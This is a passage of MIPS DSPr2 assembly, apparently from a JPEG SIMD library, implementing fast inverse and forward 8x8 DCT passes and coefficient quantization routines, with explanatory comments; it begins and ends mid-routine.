muleq_s.w.phr t1, t1, s0 /* ... tmp4 ... */
shll_s.ph s6, s6, 1 /* x2 (mulq_s.ph result is Q15: scale back) */
lw s3, 112(a1) /* quantptr[DCTSIZE*7] */
subq.ph s6, s6, s7 /* ... tmp12 */
muleq_s.w.phl v1, t7, s3 /* tmp7 ... */
muleq_s.w.phr t7, t7, s3 /* ... tmp7 ... */
ins t1, v0, 16, 16 /* ... tmp4 */
addq.ph t2, s5, s6 /* tmp1 */
subq.ph t4, s5, s6 /* tmp2 */
muleq_s.w.phl v0, t5, s2 /* tmp6 ... */
muleq_s.w.phr t5, t5, s2 /* ... tmp6 ... */
ins t7, v1, 16, 16 /* ... tmp7 */
addq.ph s5, t1, t7 /* z11 */
subq.ph s6, t1, t7 /* z12 */
muleq_s.w.phl v1, t3, s1 /* tmp5 ... */
muleq_s.w.phr t3, t3, s1 /* ... tmp5 ... */
ins t5, v0, 16, 16 /* ... tmp6 */
ins t3, v1, 16, 16 /* ... tmp5 */
addq.ph s7, t5, t3 /* z13 */
subq.ph v0, t5, t3 /* z10 */
addq.ph t7, s5, s7 /* tmp7 */
subq.ph s5, s5, s7 /* tmp11 ... */
addq.ph v1, v0, s6 /* z5 ... */
mulq_s.ph s5, s5, t8 /* ... tmp11 */
lw t8, 8(AT) /* FIX(1.847759065) */
lw s4, 0(AT) /* FIX(1.082392200) */
addq.ph s0, t0, t7
subq.ph s1, t0, t7
mulq_s.ph v1, v1, t8 /* ... z5 */
shll_s.ph s5, s5, 1 /* x2 */
lw t8, 12(AT) /* FIX(-2.613125930) */
sw s0, 0(a2) /* wsptr[DCTSIZE*0] */
shll_s.ph v0, v0, 1 /* x4 */
mulq_s.ph v0, v0, t8 /* tmp12 ... */
mulq_s.ph s4, s6, s4 /* tmp10 ... */
shll_s.ph v1, v1, 1 /* x2 */
addiu a0, a0, 4
addiu a1, a1, 4
sw s1, 112(a2) /* wsptr[DCTSIZE*7] */
shll_s.ph s6, v0, 1 /* x4 */
shll_s.ph s4, s4, 1 /* x2 */
addq.ph s6, s6, v1 /* ... tmp12 */
subq.ph t5, s6, t7 /* tmp6 */
subq.ph s4, s4, v1 /* ... tmp10 */
subq.ph t3, s5, t5 /* tmp5 */
addq.ph s2, t2, t5
addq.ph t1, s4, t3 /* tmp4 */
subq.ph s3, t2, t5
sw s2, 16(a2) /* wsptr[DCTSIZE*1] */
sw s3, 96(a2) /* wsptr[DCTSIZE*6] */
addq.ph v0, t4, t3
subq.ph v1, t4, t3
sw v0, 32(a2) /* wsptr[DCTSIZE*2] */
sw v1, 80(a2) /* wsptr[DCTSIZE*5] */
addq.ph v0, t6, t1
subq.ph v1, t6, t1
sw v0, 64(a2) /* wsptr[DCTSIZE*4] */
sw v1, 48(a2) /* wsptr[DCTSIZE*3] */
2:
bne a0, t9, 0b
addiu a2, a2, 4 /* next column pair (delay slot) */
RESTORE_REGS_FROM_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
j ra
nop
END(jsimd_idct_ifast_cols_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_idct_ifast_rows_dspr2)
/*
 * Fast ("ifast") IDCT, row pass.  Consumes the workspace produced by
 * the column pass two rows at a time (row pair interleaved into packed
 * halfwords), runs the same paired-halfword butterfly, then packs to
 * bytes with saturating shifts and recenters by adding 0x80 per byte
 * (s8 = 0x80808080) before storing to the output rows.
 *
 * a0 = wsptr
 * a1 = output_buf
 * a2 = output_col
 * a3 = mips_idct_ifast_coefs
 */
SAVE_REGS_ON_STACK 40, s0, s1, s2, s3, s4, s5, s6, s7, s8, a3
addiu t9, a0, 128 /* end address */
lui s8, 0x8080
ori s8, s8, 0x8080 /* s8 = 0x80808080: per-byte +128 recentering */
0:
lw AT, 36(sp) /* restore $a3 (mips_idct_ifast_coefs) */
lw t0, 0(a0) /* wsptr[DCTSIZE*0+0/1] b a */
lw s0, 16(a0) /* wsptr[DCTSIZE*1+0/1] B A */
lw t2, 4(a0) /* wsptr[DCTSIZE*0+2/3] d c */
lw s2, 20(a0) /* wsptr[DCTSIZE*1+2/3] D C */
lw t4, 8(a0) /* wsptr[DCTSIZE*0+4/5] f e */
lw s4, 24(a0) /* wsptr[DCTSIZE*1+4/5] F E */
lw t6, 12(a0) /* wsptr[DCTSIZE*0+6/7] h g */
lw s6, 28(a0) /* wsptr[DCTSIZE*1+6/7] H G */
precrq.ph.w t1, s0, t0 /* B b */
ins t0, s0, 16, 16 /* A a */
bnez t1, 1f
or s0, t2, s2 /* AC test (delay slot) */
bnez s0, 1f
or s0, t4, s4 /* delay slot */
bnez s0, 1f
or s0, t6, s6 /* delay slot */
bnez s0, 1f
shll_s.ph s0, t0, 2 /* descale A a (saturating, delay slot) */
/* DC-only row pair: replicate each DC across its 8 output bytes. */
lw a3, 0(a1)
lw AT, 4(a1)
precrq.ph.w t0, s0, s0 /* A A */
ins s0, s0, 16, 16 /* a a */
addu a3, a3, a2
addu AT, AT, a2
precrq.qb.ph t0, t0, t0 /* A A A A */
precrq.qb.ph s0, s0, s0 /* a a a a */
addu.qb s0, s0, s8 /* recenter to unsigned samples */
addu.qb t0, t0, s8
sw s0, 0(a3)
sw s0, 4(a3)
sw t0, 0(AT)
sw t0, 4(AT)
addiu a0, a0, 32
bne a0, t9, 0b
addiu a1, a1, 8 /* delay slot */
b 2f
nop
1:
/* Interleave the remaining coefficient pairs of the two rows. */
precrq.ph.w t3, s2, t2
ins t2, s2, 16, 16
precrq.ph.w t5, s4, t4
ins t4, s4, 16, 16
precrq.ph.w t7, s6, t6
ins t6, s6, 16, 16
/* Even part. */
lw t8, 4(AT) /* FIX(1.414213562) */
addq.ph s4, t0, t4 /* tmp10 */
subq.ph s5, t0, t4 /* tmp11 */
subq.ph s6, t2, t6 /* tmp12 ... */
addq.ph s7, t2, t6 /* tmp13 */
mulq_s.ph s6, s6, t8 /* ... tmp12 ... */
addq.ph t0, s4, s7 /* tmp0 */
subq.ph t6, s4, s7 /* tmp3 */
shll_s.ph s6, s6, 1 /* x2 */
subq.ph s6, s6, s7 /* ... tmp12 */
addq.ph t2, s5, s6 /* tmp1 */
subq.ph t4, s5, s6 /* tmp2 */
/* Odd part. */
addq.ph s5, t1, t7 /* z11 */
subq.ph s6, t1, t7 /* z12 */
addq.ph s7, t5, t3 /* z13 */
subq.ph v0, t5, t3 /* z10 */
addq.ph t7, s5, s7 /* tmp7 */
subq.ph s5, s5, s7 /* tmp11 ... */
addq.ph v1, v0, s6 /* z5 ... */
mulq_s.ph s5, s5, t8 /* ... tmp11 */
lw t8, 8(AT) /* FIX(1.847759065) */
lw s4, 0(AT) /* FIX(1.082392200) */
addq.ph s0, t0, t7 /* tmp0 + tmp7 */
subq.ph s7, t0, t7 /* tmp0 - tmp7 */
mulq_s.ph v1, v1, t8 /* ... z5 */
lw a3, 0(a1)
lw t8, 12(AT) /* FIX(-2.613125930) */
shll_s.ph s5, s5, 1 /* x2 */
addu a3, a3, a2 /* a3 = outptr = output row + output_col */
shll_s.ph v0, v0, 1 /* x4 */
mulq_s.ph v0, v0, t8 /* tmp12 ... */
mulq_s.ph s4, s6, s4 /* tmp10 ... */
shll_s.ph v1, v1, 1 /* x2 */
addiu a0, a0, 32
addiu a1, a1, 8
shll_s.ph s6, v0, 1 /* x4 */
shll_s.ph s4, s4, 1 /* x2 */
addq.ph s6, s6, v1 /* ... tmp12 */
shll_s.ph s0, s0, 2 /* saturating descale */
subq.ph t5, s6, t7 /* tmp6 */
subq.ph s4, s4, v1 /* ... tmp10 */
subq.ph t3, s5, t5 /* tmp5 */
shll_s.ph s7, s7, 2
addq.ph t1, s4, t3 /* tmp4 */
addq.ph s1, t2, t5 /* tmp1 + tmp6 */
subq.ph s6, t2, t5 /* tmp1 - tmp6 */
addq.ph s2, t4, t3 /* tmp2 + tmp5 */
subq.ph s5, t4, t3 /* tmp2 - tmp5 */
addq.ph s4, t6, t1 /* tmp3 + tmp4 */
subq.ph s3, t6, t1 /* tmp3 - tmp4 */
shll_s.ph s1, s1, 2 /* saturating descale of all outputs */
shll_s.ph s2, s2, 2
shll_s.ph s3, s3, 2
shll_s.ph s4, s4, 2
shll_s.ph s5, s5, 2
shll_s.ph s6, s6, 2
/* De-interleave the row pair and pack halfwords down to bytes. */
precrq.ph.w t0, s1, s0 /* B A */
ins s0, s1, 16, 16 /* b a */
precrq.ph.w t2, s3, s2 /* D C */
ins s2, s3, 16, 16 /* d c */
precrq.ph.w t4, s5, s4 /* F E */
ins s4, s5, 16, 16 /* f e */
precrq.ph.w t6, s7, s6 /* H G */
ins s6, s7, 16, 16 /* h g */
precrq.qb.ph t0, t2, t0 /* D C B A */
precrq.qb.ph s0, s2, s0 /* d c b a */
precrq.qb.ph t4, t6, t4 /* H G F E */
precrq.qb.ph s4, s6, s4 /* h g f e */
addu.qb s0, s0, s8 /* +128 per byte: signed -> sample range */
addu.qb s4, s4, s8
sw s0, 0(a3) /* outptr[0/1/2/3] d c b a */
sw s4, 4(a3) /* outptr[4/5/6/7] h g f e */
lw a3, -4(a1) /* second row pointer of the pair */
addu.qb t0, t0, s8
addu a3, a3, a2
addu.qb t4, t4, s8
sw t0, 0(a3) /* outptr[0/1/2/3] D C B A */
bne a0, t9, 0b
sw t4, 4(a3) /* outptr[4/5/6/7] H G F E (delay slot) */
2:
RESTORE_REGS_FROM_STACK 40, s0, s1, s2, s3, s4, s5, s6, s7, s8, a3
j ra
nop
END(jsimd_idct_ifast_rows_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_fdct_islow_dspr2)
/*
 * Accurate ("islow") 8x8 forward DCT, in place on `data`.
 * Pass 1 (label 1) processes rows using packed-halfword coefficient
 * pairs (lui/ori below) and the dpa.w.ph multiply-accumulate into
 * $ac0-$ac3, descaling by (ac + 1024) >> 11.
 * Pass 2 (label 2) processes columns with scalar mult/madd/msub,
 * descaling by (ac + 16384) >> 15.
 *
 * a0 = data
 */
SAVE_REGS_ON_STACK 40, s0, s1, s2, s3, s4, s5, s6, s7, s8
/* t0-t9 = packed coefficient halfword pairs for the row pass
 * (hi 16 bits multiply the hi lane, lo 16 bits the lo lane). */
lui t0, 6437
ori t0, 2260
lui t1, 9633
ori t1, 11363
lui t2, 0xd39e
ori t2, 0xe6dc
lui t3, 0xf72d
ori t3, 9633
lui t4, 2261
ori t4, 9633
lui t5, 0xd39e
ori t5, 6437
lui t6, 9633
ori t6, 0xd39d
lui t7, 0xe6dc
ori t7, 2260
lui t8, 4433
ori t8, 10703
lui t9, 0xd630
ori t9, 4433
li s8, 8 /* s8 = row counter */
move a1, a0
1:
/* Row pass: load 8 samples as 4 packed pairs and form the
 * sum/difference halves of the butterfly. */
lw s0, 0(a1) /* tmp0 = 1|0 */
lw s1, 4(a1) /* tmp1 = 3|2 */
lw s2, 8(a1) /* tmp2 = 5|4 */
lw s3, 12(a1) /* tmp3 = 7|6 */
packrl.ph s1, s1, s1 /* tmp1 = 2|3 */
packrl.ph s3, s3, s3 /* tmp3 = 6|7 */
subq.ph s7, s1, s2 /* tmp7 = 2-5|3-4 = t5|t4 */
subq.ph s5, s0, s3 /* tmp5 = 1-6|0-7 = t6|t7 */
mult $0, $0 /* ac0 = 0 */
dpa.w.ph $ac0, s7, t0 /* ac0 += t5* 6437 + t4* 2260 */
dpa.w.ph $ac0, s5, t1 /* ac0 += t6* 9633 + t7* 11363 */
mult $ac1, $0, $0 /* ac1 = 0 */
dpa.w.ph $ac1, s7, t2 /* ac1 += t5*-11362 + t4* -6436 */
dpa.w.ph $ac1, s5, t3 /* ac1 += t6* -2259 + t7* 9633 */
mult $ac2, $0, $0 /* ac2 = 0 */
dpa.w.ph $ac2, s7, t4 /* ac2 += t5* 2261 + t4* 9633 */
dpa.w.ph $ac2, s5, t5 /* ac2 += t6*-11362 + t7* 6437 */
mult $ac3, $0, $0 /* ac3 = 0 */
dpa.w.ph $ac3, s7, t6 /* ac3 += t5* 9633 + t4*-11363 */
dpa.w.ph $ac3, s5, t7 /* ac3 += t6* -6436 + t7* 2260 */
addq.ph s6, s1, s2 /* tmp6 = 2+5|3+4 = t2|t3 */
addq.ph s4, s0, s3 /* tmp4 = 1+6|0+7 = t1|t0 */
extr_r.w s0, $ac0, 11 /* tmp0 = (ac0 + 1024) >> 11 */
extr_r.w s1, $ac1, 11 /* tmp1 = (ac1 + 1024) >> 11 */
extr_r.w s2, $ac2, 11 /* tmp2 = (ac2 + 1024) >> 11 */
extr_r.w s3, $ac3, 11 /* tmp3 = (ac3 + 1024) >> 11 */
addq.ph s5, s4, s6 /* tmp5 = t1+t2|t0+t3 = t11|t10 */
subq.ph s7, s4, s6 /* tmp7 = t1-t2|t0-t3 = t12|t13 */
/* Odd outputs of this row (indices 1, 3, 5, 7). */
sh s0, 2(a1)
sh s1, 6(a1)
sh s2, 10(a1)
sh s3, 14(a1)
mult $0, $0 /* ac0 = 0 */
dpa.w.ph $ac0, s7, t8 /* ac0 += t12* 4433 + t13* 10703 */
mult $ac1, $0, $0 /* ac1 = 0 */
dpa.w.ph $ac1, s7, t9 /* ac1 += t12*-10704 + t13* 4433 */
sra s4, s5, 16 /* tmp4 = t11 */
addiu a1, a1, 16 /* next row */
addiu s8, s8, -1
extr_r.w s0, $ac0, 11 /* tmp0 = (ac0 + 1024) >> 11 */
extr_r.w s1, $ac1, 11 /* tmp1 = (ac1 + 1024) >> 11 */
addu s2, s5, s4 /* tmp2 = t10 + t11 */
subu s3, s5, s4 /* tmp3 = t10 - t11 */
sll s2, s2, 2 /* tmp2 = (t10 + t11) << 2 */
sll s3, s3, 2 /* tmp3 = (t10 - t11) << 2 */
/* Even outputs of this row (indices 0, 4, 2, 6; a1 already advanced). */
sh s2, -16(a1)
sh s3, -8(a1)
sh s0, -12(a1)
bgtz s8, 1b
sh s1, -4(a1) /* delay slot */
/* Scalar coefficients for the column pass. */
li t0, 2260
li t1, 11363
li t2, 9633
li t3, 6436
li t4, 6437
li t5, 2261
li t6, 11362
li t7, 2259
li t8, 4433
li t9, 10703
li a1, 10704
li s8, 8 /* s8 = column counter */
2:
/* Column pass: one column of 8 (stride 16 bytes) per iteration. */
lh a2, 0(a0) /* 0 */
lh a3, 16(a0) /* 8 */
lh v0, 32(a0) /* 16 */
lh v1, 48(a0) /* 24 */
lh s4, 64(a0) /* 32 */
lh s5, 80(a0) /* 40 */
lh s6, 96(a0) /* 48 */
lh s7, 112(a0) /* 56 */
addu s2, v0, s5 /* tmp2 = 16 + 40 */
subu s5, v0, s5 /* tmp5 = 16 - 40 */
addu s3, v1, s4 /* tmp3 = 24 + 32 */
subu s4, v1, s4 /* tmp4 = 24 - 32 */
addu s0, a2, s7 /* tmp0 = 0 + 56 */
subu s7, a2, s7 /* tmp7 = 0 - 56 */
addu s1, a3, s6 /* tmp1 = 8 + 48 */
subu s6, a3, s6 /* tmp6 = 8 - 48 */
addu a2, s0, s3 /* tmp10 = tmp0 + tmp3 */
subu v1, s0, s3 /* tmp13 = tmp0 - tmp3 */
addu a3, s1, s2 /* tmp11 = tmp1 + tmp2 */
subu v0, s1, s2 /* tmp12 = tmp1 - tmp2 */
/* Odd part: four MACs across tmp4..tmp7. */
mult s7, t1 /* ac0 = tmp7 * c1 */
madd s4, t0 /* ac0 += tmp4 * c0 */
madd s5, t4 /* ac0 += tmp5 * c4 */
madd s6, t2 /* ac0 += tmp6 * c2 */
mult $ac1, s7, t2 /* ac1 = tmp7 * c2 */
msub $ac1, s4, t3 /* ac1 -= tmp4 * c3 */
msub $ac1, s5, t6 /* ac1 -= tmp5 * c6 */
msub $ac1, s6, t7 /* ac1 -= tmp6 * c7 */
mult $ac2, s7, t4 /* ac2 = tmp7 * c4 */
madd $ac2, s4, t2 /* ac2 += tmp4 * c2 */
madd $ac2, s5, t5 /* ac2 += tmp5 * c5 */
msub $ac2, s6, t6 /* ac2 -= tmp6 * c6 */
mult $ac3, s7, t0 /* ac3 = tmp7 * c0 */
msub $ac3, s4, t1 /* ac3 -= tmp4 * c1 */
madd $ac3, s5, t2 /* ac3 += tmp5 * c2 */
msub $ac3, s6, t3 /* ac3 -= tmp6 * c3 */
extr_r.w s0, $ac0, 15 /* tmp0 = (ac0 + 16384) >> 15 */
extr_r.w s1, $ac1, 15 /* tmp1 = (ac1 + 16384) >> 15 */
extr_r.w s2, $ac2, 15 /* tmp2 = (ac2 + 16384) >> 15 */
extr_r.w s3, $ac3, 15 /* tmp3 = (ac3 + 16384) >> 15 */
addiu s8, s8, -1
addu s4, a2, a3 /* tmp4 = tmp10 + tmp11 */
subu s5, a2, a3 /* tmp5 = tmp10 - tmp11 */
/* Odd outputs of this column (rows 1, 3, 5, 7). */
sh s0, 16(a0)
sh s1, 48(a0)
sh s2, 80(a0)
sh s3, 112(a0)
mult v0, t8 /* ac0 = tmp12 * c8 */
madd v1, t9 /* ac0 += tmp13 * c9 */
mult $ac1, v1, t8 /* ac1 = tmp13 * c8 */
msub $ac1, v0, a1 /* ac1 -= tmp12 * c10 */
addiu a0, a0, 2 /* next column */
extr_r.w s6, $ac0, 15 /* tmp6 = (ac0 + 16384) >> 15 */
extr_r.w s7, $ac1, 15 /* tmp7 = (ac1 + 16384) >> 15 */
shra_r.w s4, s4, 2 /* tmp4 = (tmp4 + 2) >> 2 */
shra_r.w s5, s5, 2 /* tmp5 = (tmp5 + 2) >> 2 */
/* Even outputs (rows 0, 4, 2, 6; a0 already advanced by 2). */
sh s4, -2(a0)
sh s5, 62(a0)
sh s6, 30(a0)
bgtz s8, 2b
sh s7, 94(a0) /* delay slot */
RESTORE_REGS_FROM_STACK 40, s0, s1, s2, s3, s4, s5, s6, s7, s8
jr ra
nop
END(jsimd_fdct_islow_dspr2)
/**************************************************************************/
LEAF_DSPR2(jsimd_fdct_ifast_dspr2)
/*
 * Fast ("ifast") 8x8 forward DCT, in place on `data`.
 * Pass 0 (label 0) transforms rows using packed-halfword DSP math;
 * pass 1 (label 1) transforms columns with scalar/MAC math.
 * Constants are the ifast multipliers in 8-bit fixed point, packed as
 * identical halfword pairs for the dpa.w.ph/mulq paths:
 *   334 = FIX_1_306562965, 139 = FIX_0_541196100,
 *    98 = FIX_0_382683433, 181 = FIX_0_707106781.
 *
 * a0 = data
 */
.set at
SAVE_REGS_ON_STACK 8, s0, s1
li a1, 0x014e014e /* FIX_1_306562965 (334 << 16) |
(334 & 0xffff) */
li a2, 0x008b008b /* FIX_0_541196100 (139 << 16) |
(139 & 0xffff) */
li a3, 0x00620062 /* FIX_0_382683433 (98 << 16) |
(98 & 0xffff) */
li s1, 0x00b500b5 /* FIX_0_707106781 (181 << 16) |
(181 & 0xffff) */
move v0, a0
addiu v1, v0, 128 /* end address (8 rows x 16 bytes) */
0:
/* Row pass. */
lw t0, 0(v0) /* tmp0 = 1|0 */
lw t1, 4(v0) /* tmp1 = 3|2 */
lw t2, 8(v0) /* tmp2 = 5|4 */
lw t3, 12(v0) /* tmp3 = 7|6 */
packrl.ph t1, t1, t1 /* tmp1 = 2|3 */
packrl.ph t3, t3, t3 /* tmp3 = 6|7 */
subq.ph t7, t1, t2 /* tmp7 = 2-5|3-4 = t5|t4 */
subq.ph t5, t0, t3 /* tmp5 = 1-6|0-7 = t6|t7 */
addq.ph t6, t1, t2 /* tmp6 = 2+5|3+4 = t2|t3 */
addq.ph t4, t0, t3 /* tmp4 = 1+6|0+7 = t1|t0 */
addq.ph t8, t4, t6 /* tmp5 = t1+t2|t0+t3 = t11|t10 */
subq.ph t9, t4, t6 /* tmp7 = t1-t2|t0-t3 = t12|t13 */
sra t4, t8, 16 /* tmp4 = t11 */
mult $0, $0 /* ac0 = 0 */
dpa.w.ph $ac0, t9, s1 /* ac0 += t12*181 + t13*181 */
mult $ac1, $0, $0 /* ac1 = 0 */
dpa.w.ph $ac1, t7, a3 /* ac1 += t4*98 + t5*98 */
dpsx.w.ph $ac1, t5, a3 /* ac1 += t6*98 + t7*98 */
mult $ac2, $0, $0 /* ac2 = 0 */
dpa.w.ph $ac2, t7, a2 /* ac2 += t4*139 + t5*139 */
mult $ac3, $0, $0 /* ac3 = 0 */
dpa.w.ph $ac3, t5, a1 /* ac3 += t6*334 + t7*334 */
precrq.ph.w t0, t5, t7 /* t0 = t5|t6 */
addq.ph t2, t8, t4 /* tmp2 = t10 + t11 */
subq.ph t3, t8, t4 /* tmp3 = t10 - t11 */
extr.w t4, $ac0, 8 /* descale: drop the 8 fraction bits */
mult $0, $0 /* ac0 = 0 */
dpa.w.ph $ac0, t0, s1 /* ac0 += t5*181 + t6*181 */
extr.w t0, $ac1, 8 /* t0 = z5 */
extr.w t1, $ac2, 8 /* t1 = MULTIPLY(tmp10, 139) */
extr.w t7, $ac3, 8 /* t2 = MULTIPLY(tmp12, 334) */
extr.w t8, $ac0, 8 /* t8 = z3 = MULTIPLY(tmp11, 181) */
add t6, t1, t0 /* t6 = z2 */
add t7, t7, t0 /* t7 = z4 */
subq.ph t0, t5, t8 /* t0 = z13 = tmp7 - z3 */
addq.ph t8, t5, t8 /* t9 = z11 = tmp7 + z3 */
addq.ph t1, t0, t6 /* t1 = z13 + z2 */
subq.ph t6, t0, t6 /* t6 = z13 - z2 */
addq.ph t0, t8, t7 /* t0 = z11 + z4 */
subq.ph t7, t8, t7 /* t7 = z11 - z4 */
addq.ph t5, t4, t9
subq.ph t4, t9, t4
/* Store the transformed row. */
sh t2, 0(v0)
sh t5, 4(v0)
sh t3, 8(v0)
sh t4, 12(v0)
sh t1, 10(v0)
sh t6, 6(v0)
sh t0, 2(v0)
sh t7, 14(v0)
addiu v0, 16 /* next row */
bne v1, v0, 0b
nop
move v0, a0
addiu v1, v0, 16 /* end address: 8 columns x 2 bytes */
1:
/* Column pass: one column (stride 16 bytes) per iteration. */
lh t0, 0(v0) /* 0 */
lh t1, 16(v0) /* 8 */
lh t2, 32(v0) /* 16 */
lh t3, 48(v0) /* 24 */
lh t4, 64(v0) /* 32 */
lh t5, 80(v0) /* 40 */
lh t6, 96(v0) /* 48 */
lh t7, 112(v0) /* 56 */
add t8, t0, t7 /* t8 = tmp0 */
sub t7, t0, t7 /* t7 = tmp7 */
add t0, t1, t6 /* t0 = tmp1 */
sub t1, t1, t6 /* t1 = tmp6 */
add t6, t2, t5 /* t6 = tmp2 */
sub t5, t2, t5 /* t5 = tmp5 */
add t2, t3, t4 /* t2 = tmp3 */
sub t3, t3, t4 /* t3 = tmp4 */
add t4, t8, t2 /* t4 = tmp10 = tmp0 + tmp3 */
sub t8, t8, t2 /* t8 = tmp13 = tmp0 - tmp3 */
sub s0, t0, t6 /* s0 = tmp12 = tmp1 - tmp2 */
ins t8, s0, 16, 16 /* t8 = tmp12|tmp13 */
add t2, t0, t6 /* t2 = tmp11 = tmp1 + tmp2 */
mult $0, $0 /* ac0 = 0 */
dpa.w.ph $ac0, t8, s1 /* ac0 += t12*181 + t13*181 */
add s0, t4, t2 /* t8 = tmp10+tmp11 */
sub t4, t4, t2 /* t4 = tmp10-tmp11 */
sh s0, 0(v0) /* dataptr[0] */
sh t4, 64(v0) /* dataptr[4] */
extr.w t2, $ac0, 8 /* z1 = MULTIPLY(tmp12+tmp13,
FIX_0_707106781) */
addq.ph t4, t8, t2 /* t9 = tmp13 + z1 */
subq.ph t8, t8, t2 /* t2 = tmp13 - z1 */
sh t4, 32(v0) /* dataptr[2] */
sh t8, 96(v0) /* dataptr[6] */
/* Odd part. */
add t3, t3, t5 /* t3 = tmp10 = tmp4 + tmp5 */
add t0, t5, t1 /* t0 = tmp11 = tmp5 + tmp6 */
add t1, t1, t7 /* t1 = tmp12 = tmp6 + tmp7 */
andi t4, a1, 0xffff /* low halfword of the packed constant */
mul s0, t1, t4
sra s0, s0, 8 /* s0 = z4 =
MULTIPLY(tmp12, FIX_1_306562965) */
ins t1, t3, 16, 16 /* t1 = tmp10|tmp12 */
mult $0, $0 /* ac0 = 0 */
mulsa.w.ph $ac0, t1, a3 /* ac0 += t10*98 - t12*98 */
extr.w t8, $ac0, 8 /* z5 = MULTIPLY(tmp10-tmp12,
FIX_0_382683433) */
add t2, t7, t8 /* t2 = tmp7 + z5 */
sub t7, t7, t8 /* t7 = tmp7 - z5 */
andi t4, a2, 0xffff
mul t8, t3, t4
sra t8, t8, 8 /* t8 = z2 =
MULTIPLY(tmp10, FIX_0_541196100) */
andi t4, s1, 0xffff
mul t6, t0, t4
sra t6, t6, 8 /* t6 = z3 =
MULTIPLY(tmp11, FIX_0_707106781) */
add t0, t6, t8 /* t0 = z3 + z2 */
sub t1, t6, t8 /* t1 = z3 - z2 */
add t3, t6, s0 /* t3 = z3 + z4 */
sub t4, t6, s0 /* t4 = z3 - z4 */
sub t5, t2, t1 /* t5 = dataptr[5] */
sub t6, t7, t0 /* t6 = dataptr[3] */
add t3, t2, t3 /* t3 = dataptr[1] */
add t4, t7, t4 /* t4 = dataptr[7] */
sh t5, 80(v0)
sh t6, 48(v0)
sh t3, 16(v0)
sh t4, 112(v0)
addiu v0, 2 /* next column */
bne v0, v1, 1b
nop
RESTORE_REGS_FROM_STACK 8, s0, s1
j ra
nop
END(jsimd_fdct_ifast_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_quantize_dspr2)
/*
 * Quantize the 64 FDCT coefficients in `workspace` into `coef_block`,
 * two coefficients per iteration.  Division is done by reciprocal
 * multiplication: per this routine's divisors layout, 0(a1) holds the
 * reciprocal, 128(a1) the rounding correction, and 384(a1) the extra
 * shift count.  Sign handling: t3/s0 = (x >> 15)*2 + 1 = +1 or -1, so
 * multiplying by it once takes |x| and multiplying again restores the
 * sign after the unsigned reciprocal divide.
 *
 * a0 = coef_block
 * a1 = divisors
 * a2 = workspace
 */
.set at
SAVE_REGS_ON_STACK 16, s0, s1, s2
addiu v0, a2, 124 /* v0 = workspace_end */
/* Prime the software pipeline with the first coefficient pair. */
lh t0, 0(a2)
lh t1, 0(a1)
lh t2, 128(a1)
sra t3, t0, 15 /* t3 = sign(x): -1 or 0 ... */
sll t3, t3, 1
addiu t3, t3, 1 /* ... -> -1 or +1 */
mul t0, t0, t3 /* t0 = |x| */
lh t4, 384(a1)
lh t5, 130(a1)
lh t6, 2(a2)
lh t7, 2(a1)
lh t8, 386(a1)
1:
/* First coefficient of the pair. */
andi t1, 0xffff /* reciprocal as unsigned */
add t9, t0, t2 /* |x| + correction */
andi t9, 0xffff
mul v1, t9, t1 /* unsigned reciprocal multiply */
sra s0, t6, 15 /* sign of second coefficient ... */
sll s0, s0, 1
addiu s0, s0, 1 /* ... -> -1 or +1 */
addiu t9, t4, 16 /* shift count + 16 */
srav v1, v1, t9
mul v1, v1, t3 /* restore sign */
mul t6, t6, s0 /* |second coefficient| */
andi t7, 0xffff
addiu a2, a2, 4
addiu a1, a1, 4
/* Second coefficient of the pair. */
add s1, t6, t5
andi s1, 0xffff
sh v1, 0(a0)
mul s2, s1, t7
addiu s1, t8, 16
srav s2, s2, s1
mul s2, s2, s0 /* restore sign */
/* Preload the next pair while the stores retire. */
lh t0, 0(a2)
lh t1, 0(a1)
sra t3, t0, 15
sll t3, t3, 1
addiu t3, t3, 1
mul t0, t0, t3
lh t2, 128(a1)
lh t4, 384(a1)
lh t5, 130(a1)
lh t8, 386(a1)
lh t6, 2(a2)
lh t7, 2(a1)
sh s2, 2(a0)
lh t0, 0(a2)
sra t3, t0, 15
sll t3, t3, 1
addiu t3, t3, 1
mul t0, t0, t3
bne a2, v0, 1b
addiu a0, a0, 4 /* delay slot */
/* Epilogue: quantize the final preloaded pair. */
andi t1, 0xffff
add t9, t0, t2
andi t9, 0xffff
mul v1, t9, t1
sra s0, t6, 15
sll s0, s0, 1
addiu s0, s0, 1
addiu t9, t4, 16
srav v1, v1, t9
mul v1, v1, t3
mul t6, t6, s0
andi t7, 0xffff
sh v1, 0(a0)
add s1, t6, t5
andi s1, 0xffff
mul s2, s1, t7
addiu s1, t8, 16
addiu a2, a2, 4
addiu a1, a1, 4
srav s2, s2, s1
mul s2, s2, s0
sh s2, 2(a0)
RESTORE_REGS_FROM_STACK 16, s0, s1, s2
j ra
nop
END(jsimd_quantize_dspr2)
#ifndef __mips_soft_float
/*****************************************************************************/
LEAF_DSPR2(jsimd_quantize_float_dspr2)
/*
 * Quantize/descale one 8x8 block of floating-point DCT coefficients.
 *
 * a0 = coef_block  (output: 64 x 16-bit quantized coefficients)
 * a1 = divisors    (input: 64 single-precision reciprocal divisors)
 * a2 = workspace   (input: 64 single-precision raw FDCT output values)
 *
 * Each output is  (int)(workspace[i] * divisors[i] + 16384.5) - 16384,
 * i.e. round-to-nearest implemented with a bias constant so that a plain
 * truncation (trunc.w.s) can be used.  8 coefficients per iteration;
 * t0 counts 63, 55, ..., 7, so the loop body runs 8 times.  FP loads,
 * converts and integer stores are interleaved to hide FPU latency.
 */
.set at
li t1, 0x46800100 /* integer representation 16384.5 */
mtc1 t1, f0 /* f0 = 16384.5f (rounding bias) */
li t0, 63
0:
lwc1 f2, 0(a2)
lwc1 f10, 0(a1)
lwc1 f4, 4(a2)
lwc1 f12, 4(a1)
lwc1 f6, 8(a2)
lwc1 f14, 8(a1)
lwc1 f8, 12(a2)
lwc1 f16, 12(a1)
madd.s f2, f0, f2, f10 /* f2 = 16384.5 + in*div */
madd.s f4, f0, f4, f12
madd.s f6, f0, f6, f14
madd.s f8, f0, f8, f16
lwc1 f10, 16(a1)
lwc1 f12, 20(a1)
trunc.w.s f2, f2 /* truncate toward zero (bias makes it rounding) */
trunc.w.s f4, f4
trunc.w.s f6, f6
trunc.w.s f8, f8
lwc1 f14, 24(a1)
lwc1 f16, 28(a1)
mfc1 t1, f2
mfc1 t2, f4
mfc1 t3, f6
mfc1 t4, f8
lwc1 f2, 16(a2)
lwc1 f4, 20(a2)
